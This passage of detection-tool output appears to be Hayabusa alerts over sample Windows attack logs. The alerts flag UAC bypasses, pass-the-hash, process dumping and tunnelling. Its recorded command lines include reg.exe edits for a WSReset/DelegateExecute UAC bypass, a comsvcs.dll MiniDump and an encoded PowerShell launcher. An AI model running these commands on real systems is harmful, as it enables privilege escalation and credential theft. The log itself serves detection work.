C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\system32\reg.exe | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,high,PrivEsc 
| Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.609 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3fb | PID: 200 | PGUID: 747F3D96-B07F-5D46-0000-001050C80F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 312 000002806444CB40 | Process: C:\Windows\System32\consent.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3952 | PGUID: 747F3D96-B07F-5D46-0000-0010C1CB0F04,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3b3 | PID: 2112 | PGUID: 747F3D96-B080-5D46-0000-0010D4EA0F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass WSReset,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WSReset.exe"" | LID: 0x18d3b3 | PID: 820 | PGUID: 747F3D96-B091-5D46-0000-001081F71104",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Wsreset UAC Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via WSReset.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.455 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | LID: 0x18d3b3 | PID: 7792 | PGUID: 747F3D96-B092-5D46-0000-001089041204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.441 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
sihost.exe | LID: 0x18d3fb | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.643 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: {4ED3A719-CEA8-4BD9-910D-E252F997AFC2} | Process: C:\Windows\system32\reg.exe | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.712 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x38f87e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 1052 | PGUID: 747F3D96-F639-5D53-0000-001067DA2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x29126 | PID: 6000 | PGUID: 747F3D96-F639-5D53-0000-001092EE2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0x29126 | PID: 8180 | PGUID: 747F3D96-F639-5D53-0000-0010B0FC2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 
20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 2476 | PGUID: 747F3D96-FBCA-5D53-0000-0010B8664100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | LID: 0x29126 | PID: 2876 | PGUID: 747F3D96-FBCA-5D53-0000-001036784100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,ResDev,Relevant Anti-Virus 
Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript c:\ProgramData\memdump.vbs notepad.exe | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\cmd.exe | LID: 0xe81e5 | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,Exec,WScript or CScript Dropper,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00 | Hash: SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,info,Exec,WMI Modules 
Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0xe81e5 | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.396 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\notepad.bin | Process: C:\Windows\system32\rundll32.exe | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.439 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,CredAccess - Memdump | Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2888 | Src PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00 | Tgt 
PID: 4868 | Tgt PGUID: 747F3D96-1C5C-5D69-0000-0010FEB71E00,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx +2019-09-01 21:04:22.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:445 (MSEDGEWIN10) | Dst: 10.0.2.17:59767 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx +2019-09-01 21:04:22.908 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:62733 (MSEDGEWIN10) | Dst: 10.0.2.17:445 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49947 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49947 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49948 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:58.463 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49948 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49949 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 